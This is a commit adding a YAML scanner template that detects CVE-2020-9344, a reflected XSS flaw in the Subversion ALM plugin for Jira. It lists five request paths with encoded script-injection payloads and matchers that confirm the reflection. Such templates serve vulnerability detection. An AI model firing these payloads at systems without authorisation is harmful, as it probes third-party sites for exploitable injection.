Merge pull request #590 from Mad-robot/master

Create CVE-2020-9344.yaml

cves/CVE-2020-9344.yaml

@@ -0,0 +1,29 @@
+id: cve-2020-9344
+
+info:
+  name: Jira Subversion ALM for enterprise XSS
+  author: madrobot
+  severity: medium
+  description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
+
+# source:- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
+# https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
+# https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(document.domain)</script>"
+        part: body
+      - type: status
+        status:
+          - 200